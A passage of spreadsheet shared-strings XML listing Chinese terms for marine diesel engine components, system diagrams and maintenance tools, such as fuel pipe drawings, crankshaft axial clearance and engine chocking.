    </r>
  </si>
  <si>
    <r>
      <t>DENIS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带盒深度尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机控制系统说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气管系图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管系图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管系图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗装置原理图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>百分表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刻度盘式温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>污油泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距套（两半）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机离合装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拨叉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手轮盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器拆卸工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承瓦拆卸工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套拆卸尺寸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆解和安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸和组装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓拆卸尺寸图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨拆装尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距滚子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带螺旋桨时的系泊试验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双油缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>宽缘工字钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工字钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双向止回阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头预紧拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型法兰梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹圆锥销管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函排放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器排放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱排放管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排放螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱排放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横向拉拔工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻孔模</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器干清洗</t>
    </r>
  </si>
  <si>
    <r>
      <t>DU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器喷射试验工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双联滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接地装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接地设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底线块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏心轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性联轴节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路接线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源供给电气图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊条合金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-50</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子元件布线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急操纵台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急润滑系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端点角度</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动端中间体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出端罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴轴向间隙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体驱动端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体驱动端订货图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体自由端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体自由端订货图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端铣刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机校中</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机装配记录</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机控制系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机淡水冷却</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机海水冷却</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机飞轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机连接飞轮外壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机横剖图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机走台布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机测试仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机纵剖图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机外形图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机外形图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱高度，起吊能力</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机基座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机速度控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机顶撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机顶撑布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机液压式顶撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机摩擦片式顶撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
